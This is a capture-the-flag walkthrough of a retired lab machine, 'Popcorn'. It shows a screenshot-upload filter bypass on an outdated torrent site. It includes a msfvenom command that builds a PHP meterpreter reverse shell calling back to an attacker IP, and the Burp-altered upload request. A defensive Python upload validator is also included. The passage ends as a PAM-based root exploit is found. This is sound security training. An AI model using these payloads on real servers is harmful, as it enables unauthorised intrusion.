Today we’re going to solve another CTF machine, “Popcorn”. It is now a retired box and can be accessed if you’re a VIP member.
- Target OS: Linux
- Services: SSH, HTTP
- IP Address: 10.10.10.6
- Difficulty: Easy
- Bypassing Image Uploading Restriction
- Linux PAM 1.1.0
- Getting user
- Getting root
As always, the first step is the reconnaissance phase: port scanning.
During this step we’re gonna identify the target to see what we have behind the IP address.
Since port 80 is open and running Apache, let’s take a look at it.
We have a page saying “It works!”. Since we don’t have any other way to look around, let’s take a look at the hidden directories.
For that you can use these tools.
We found our directory “http://10.10.10.6/torrent/”. Let’s take a look.
So we have a torrent script running, and after registration I found we can upload torrent files and screenshots. Since this script looks outdated, let’s try uploading our shell and bypassing the image restrictions.
Let’s upload our torrent file.
After successfully uploading our torrent file we don’t have an image upload field, so let’s take a look at “My Torrents”.
We can see now that we have an option to upload screenshots and that’s what we needed to move ahead.
Let’s try our luck and upload a shell.
Let’s create a php shell. We can use msfvenom for now but there’s many ways to do it.
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.4 LPORT=1337 -f raw > shell.php
So now we have ‘shell.php’, but we have to upload an image. To do that we’re gonna rename ‘shell.php’ to ‘shell.php.png’ for now, upload it and intercept the request via Burp Suite.
Let’s upload our shell and intercept via burp suite.
Content-Disposition: form-data; name="file"; filename="shell.php.png"
Content-Type: image/png
Change “shell.php.png” to “shell.php” and send the request.
Response after uploading shell.
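The bypass works because the application only checks the client-supplied filename, which Burp lets us rewrite after the browser has picked a .png. The server-side validator below is an added example (not the torrent hoster’s code) showing what such an upload handler should have done: allow-list the extension, require the declared Content-Type to match it, check the file’s magic bytes, and store under a server-generated name. The sample uploads are constructed to mirror the intercepted request above.

```python
import secrets

# Extension allow-list and the leading bytes (magic) each must carry.
IMAGE_SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
CONTENT_TYPES = {"png": "image/png", "jpg": "image/jpeg",
                 "jpeg": "image/jpeg", "gif": "image/gif"}
PHP_MARKERS = (b"<?php", b"<?=")


def validate_screenshot(filename, content_type, data):
    """Return (accepted, reason_or_ext). Every check is server-side; none of
    them trusts the filename or Content-Type the client chose on its own."""
    # Strip any path component the client may have sent, keep the last extension.
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if "." not in name:
        return False, "no extension"
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in IMAGE_SIGNATURES:
        return False, f"extension .{ext} not allowed"
    # The declared MIME type must agree with the extension.
    if content_type.split(";")[0].strip().lower() != CONTENT_TYPES[ext]:
        return False, "Content-Type does not match extension"
    # The bytes must actually begin like an image of the declared kind.
    if not data.startswith(IMAGE_SIGNATURES[ext]):
        return False, "file content is not a valid image header"
    # Defence in depth: refuse images that also carry PHP open tags.
    if any(marker in data for marker in PHP_MARKERS):
        return False, "PHP code embedded in image"
    return True, ext


def storage_name(ext):
    """Server-chosen name: the client's filename never reaches the filesystem."""
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed sample uploads (inert bodies) mirroring the post's request.
SAMPLES = [
    ("shell.php", "image/png", b"<?php /* constructed, not an image */ ?>"),
    ("shell.php.png", "image/png", b"<?php /* constructed, not an image */ ?>"),
    ("screen.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
]

if __name__ == "__main__":
    for fn, ct, body in SAMPLES:
        print(fn, validate_screenshot(fn, ct, body))
```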
After successfully uploading our shell we don’t know the actual path it was uploaded to.
We have to run dirbuster against the torrent directory so we can enumerate more directories.
We got our directory ‘upload’, so let’s take a look at it.
So we got the reverse shell.
After getting a user we’re gonna move forward.
Let’s get straight into getting root. For that we normally do some basic findings and run privilege escalation scripts.
So for that we’re gonna run ls -la on /home/george/
drwxr-xr-x 3 george george   4096 2017-03-17 23:16 .
drwxr-xr-x 3 root   root     4096 2017-03-17 16:49 ..
-rw------- 1 root   root     2769 2017-05-05 23:12 .bash_history
-rw-r--r-- 1 george george    220 2017-03-17 16:49 .bash_logout
-rw-r--r-- 1 george george   3180 2017-03-17 16:49 .bashrc
drwxr-xr-x 2 george george   4096 2017-03-17 18:58 .cache
-rw------- 1 root   root     1571 2017-03-17 21:11 .mysql_history
-rw------- 1 root   root       19 2017-05-05 23:12 .nano_history
-rw-r--r-- 1 george george    675 2017-03-17 16:49 .profile
-rw-r--r-- 1 george george      0 2017-03-17 18:58 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 2017-03-17 18:57 torrenthoster.zip
-rw-r--r-- 1 george george     33 2017-03-17 23:16 user.txt
After taking a look at .cache we have an uncommon file.
We can also do ls -lAR
./.cache:
total 0
-rw-r--r-- 1 george george 0 2017-03-17 18:58 motd.legal-displayed
As displayed, we have an uncommon file inside .cache: “motd.legal-displayed”.
After some Google research we have our exploit!